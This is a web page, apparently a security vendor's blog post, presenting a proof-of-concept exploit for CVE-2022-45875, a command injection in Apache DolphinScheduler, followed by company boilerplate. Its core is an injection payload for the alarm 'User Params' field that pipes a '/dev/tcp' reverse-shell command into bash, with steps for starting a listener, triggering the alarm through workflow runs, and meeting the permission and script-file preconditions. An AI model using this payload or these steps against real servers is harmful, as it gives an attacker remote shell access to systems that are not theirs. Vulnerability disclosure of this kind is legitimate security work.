Skip to content

CVE-2022-45875: Apache DolphinScheduler Remote Code Execution PoC


Improper Input Validation leads to command injection/RCE in #Apache #DolphinScheduler has been found and registered as #CVE-2022-45875 We already published the analysis blog for this CVE, breaking down what’s going behind the scenes, you can check it from here:

Remote Code Execution PoC

  • Supposing you already found an alarm you can edit or create a new one.
  • Add the following payload '; echo "sh -i >& /dev/tcp/ 0>&1"|bash;# to the “User Params”
  • Run your listener
  • There are two ways to lunch the exploit now
    • Go to “Projects>Click on the project name>Worflow Definition>Start” This is already mentioned in the analysis blog.
    • Go to “Projects>Click on the project name>Worflow instance>Rerun”  


  1. Usually, when you access Apache DolphinScheduler you will find tenants, alarms, and project, workflows are ready.
  2. You need to make sure that you have the permissions to edit the alarm so you can add your payload, and at least run workflow so you can decide which alarm group will run for notification. if you can run a workflow and choose the alarm group that includes the malicious one, you will be able to exploit it.
  3. You need a script that exists in the server already, so when the alarm gets triggered it will trigger the payload as well because there are multiple checks and one of them check if the script file exists or not. for more information about this check the analysis blog.

About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.



Click one of our contacts below to chat on WhatsApp